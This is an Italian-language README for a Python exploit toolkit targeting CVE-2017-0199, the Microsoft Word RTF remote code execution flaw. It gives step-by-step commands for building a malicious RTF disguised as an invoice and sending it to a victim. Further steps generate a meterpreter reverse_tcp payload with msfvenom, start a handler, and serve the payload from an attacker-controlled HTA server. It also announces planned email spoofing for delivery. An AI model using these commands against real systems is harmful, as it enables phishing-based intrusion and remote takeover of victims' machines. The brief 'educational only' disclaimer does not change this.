
Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare un payload metasploit / meterpreter / qualsiasi altro alla vittima senza alcuna configurazione complessa.
Exploit toolkit CVE-2017-0199 - v2.0 è un comodo script Python che fornisce un modo rapido ed efficace per sfruttare Microsoft RTF RCE. Può generare un file RTF malevolo e consegnare il payload metasploit / meterpreter alla vittima senza alcuna configurazione complessa.
Introdotte le seguenti funzionalità nello script
- Generare un file RTF malevolo usando il toolkit
- Eseguire il toolkit in modalità di sfruttamento come piccolo HTA + server web
Versione: Python versione 2.7.13
Sto lavorando sulla seguente funzionalità
- Inviare automaticamente il file RTF malevolo generato alla vittima usando lo spoofing email
Passo 1: Generare un file RTF malevolo usando il comando seguente e inviarlo alla vittima
Sintassi:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Esempio:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
Passo 2 (Opzionale, se si utilizza un payload MSF): Generare il payload metasploit e avviare l'handler
Esempio:
Genera Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Avvia Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Passo 3: Avviare il toolkit in modalità di sfruttamento per consegnare i payload
Sintassi:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Esempio:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
Questo è un comodo toolkit per sfruttare CVE-2017-0199 (Microsoft Word RTF RCE)
Modalità:
-M gen Genera solo il file RTF malevolo
Genera file RTF malevolo:
-w <Filename.rtf> Nome del file RTF malevolo (Condividi questo file con la vittima).
-u <http://attacker.com/test.hta> Il percorso di un file hta. Normalmente, dovrebbe essere un dominio o un indirizzo IP dove questo tool è in esecuzione.
Per esempio, http://attackerip.com/test.hta (Questo URL sarà incluso nel file RTF malevolo e
sarà richiesto una volta che la vittima aprirà il file RTF malevolo.
-M exp Avvia la modalità di sfruttamento
Sfruttamento:
-p <TCP port:Default 80> Numero di porta locale.
-e <http://attacker.com/shell.exe> Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.
-l </tmp/shell.exe> Percorso locale di un file eseguibile / shell meterpreter / payload (Se il payload è ospitato localmente).
Questo programma è SOLO per scopi educativi. Non usarlo senza permesso. Vale la consueta clausola di esclusione di responsabilità, specialmente il fatto che io (bhdresh) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet NON si assume ALCUNA responsabilità per i contenuti o l'uso improprio di questi programmi o loro derivati. Usando questo programma accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è di responsabilità di bhdresh.
@nixawk per il campione RTF, @bhdresh
Ovviamente, non sono uno sviluppatore a tempo pieno, quindi aspettatevi qualche intoppo
Segnalate bug e problemi a [email protected]